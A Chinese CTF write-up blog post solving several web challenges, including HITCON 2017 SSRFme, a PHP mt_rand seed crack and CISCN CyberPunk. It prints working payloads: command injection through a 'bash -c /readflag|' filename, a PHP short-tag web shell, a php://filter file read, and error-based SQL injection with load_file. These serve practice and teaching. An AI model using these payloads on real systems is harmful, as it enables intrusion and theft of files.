[HITCON 2017]SSRFme

首先理清代码逻辑。
上边一部分是输出输出了一下$_SERVER[“REMOTE_ADDR”]，然后以
sandbox/" . md5(“orange” . $_SERVER[“REMOTE_ADDR”])为路径创建目录。
之后就是将当前目录转到了创建的目录下。
目录可以直接计算出来，先计算一下目录。

PHP$a = "sandbox/" . md5("orange127.0.0.1");//127.0.0.1是示例echo $a;//创造的目录

shell_exec函数比较熟悉不用看，去看一下pathinfo。


过滤了点，防止了目录遍历，之后是file_put_contents写入文件。
先随便尝试一下。
?url=/&filename=feng
然后访问/sandbox/xxx/feng（xxx为自己脚本跑出的路径）

但直接去得到/flag的内容时无法成功，然后访问/readflag下载下来是一个乱码文件，应该是需要去执行readflag文件。
shell_exec函数支持file协议； 可以利用base -c "cmd"进行命令执行，先创建文件bash -c /readflag|。

?url=&filename=bash -c /readflag|

然后通过伪协议将读取flag再放入其他文件里。

?url=file:bash -c /readflag|&filename=feng

然后/sandbox/xxx/feng即可得到flag。

[watevrCTF-2019]Cookie Store

打开后发现flag需要用钱买，有题目可知，肯定是Cookie里存在钱的信息，看一下。

发现money直接明文储存在cookie里，并且买过东西的返回值也在cookie中，修改money买flag。

然后base64解码cookie，flag就在cookie里。

[红明谷CTF 2021]write_shell

还是简单的代码审计。
代码思路很容易理解，传入action时，输出创建的目录，然后如果是upload时，便会在该目录中写入一个index.php文件，然后对data进行了过滤。
<和=都没有被过滤，直接利用段标签绕过即可。
先访问

?action=pwd

然后便会看到创建的目录，之后我们再写入木马文件。
?action=upload&data=
访问目录。

?action=upload&data=<?=`cat%09/f*`?>

然后再访问即可得到flag。

[b01lers2020]Welcome to Earth

一顿乱找，再/fight提示的/static/js/fight.js文件里找到了flag信息。

// Run to scramble original flag//console.log(scramble(flag, action));function scramble(flag, key) {  for (var i = 0; i < key.length; i++) {    let n = key.charCodeAt(i) % flag.length;    let temp = flag[i];    flag[i] = flag[n];    flag[n] = temp;  }  return flag;}function check_action() {  var action = document.getElementById("action").value;  var flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"];  // TODO: unscramble function}

写个排列脚本即可。（直接自己用眼看也可）

from itertools import permutationsflag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]item = permutations(flag)for i in item:k = ''.join(list(i))if k.startswith('pctf{hey_boys') and k[-1] == '}':print(k)

不能理解这题有什么意思。

[GWCTF 2019]枯燥的抽奖

发现了check.php文件，发现是mt_rand生成的随机数，但存在漏洞。
mt_rand生成的是伪随机数：
所谓伪随机数，可以理解为可预测性的，生成伪随机数是线性的，例如：mt_rand()这个函数，如果知道他的分发seed种子，然后种子有了后，靠mt_rand()生成随机数。
我们知道了随机数的前十个，可与利用php_mt_seed*（PHP mt_rand（）种子破解程序）工具来破解随机数。
下载网址：

php_mt_seed*下载地址

先用脚本将伪随机数转换成php_mt_seed可以识别的数据

str1 = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'str2 = 'liG57uc3Ls'str3 = str1[::-1]res = ''for i in range(len(str2)):    for j in range(len(str1)):        if str2[i] == str1[j]:            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '            breakprint(res)

然后安装工具进行爆破。

然后破解出来了随机数，记得php版本，需要7.1以上的。

然后用脚本来得到需要的字符串。

mt_srand(627353629);//爆破出来的随机数$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";$str='';$len1=20;for ( $i = 0; $i < $len1; $i++ ){    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       }echo "
".$str."
";

输入即可得到flag。

[NCTF2019]True XML cookbook

题目直接给了提示xml，发现登录框，找了个payload试了一下。

发现成功了，但是没有flag文件，常用的文件名都试过了，不行。
然后还差看了/etc/gpsts文件，但没发现什么。
在网上看到wp发现都是在/proc/net/arp，发现了内网信息。
然后就访问了内网。改了一下c字段。（但一直都没实现成功，先放到这吧）

[CISCN2019 华北赛区 Day1 WEB5]CyberPunk

在源码中发现了任意文件读取漏洞。

payload:

?file=php://filter/convert.base64-encode/resource=index.php

顺便把search.php、change.php、delete.php都读出来。
一个一个都看了一下，看着就像是sql注入，本来还以为是绕过，但发现过滤了很多，绕不过去，但在change.php中发现。

$address = addslashes($_POST["address"]);

address仅用了addslashes过滤，连正则都没用，那肯定是这里的问题。
发现只有信息报错的时候才会被打印出来，所以猜测是二次注入中的报错注入。
先用常规payload试一下，闭合前边然后修改user_id的内容，在闭合后边。

1'where user_id=extractvalue(1,concat(0x7e,(select user()),0x7e));#

找了好久都没有找到flag，无语。
在网上看到可以利用load_file来直接读取文件，但是flag.txt文件是直接猜出来的吗？
payload:

1'where user_id=extractvalue(1,concat(0x7e,(select (load_file('/flag.txt'))),0x7e));#

有长度限制，用substring输出后边的即可。
payload：

1'where user_id=extractvalue(1,concat(0x7e,(select substring(load_file('/flag.txt'),25,50)),0x7e));#

看到还有大佬，直接改address的数据。
payload：

',address=(select load_file('/flag.txt'));#

原理也挺简单，利用change.php中插入时，修改了address的值。
然后查询即可得到flag。

来源地址：https://blog.csdn.net/akxnxbshai/article/details/127448852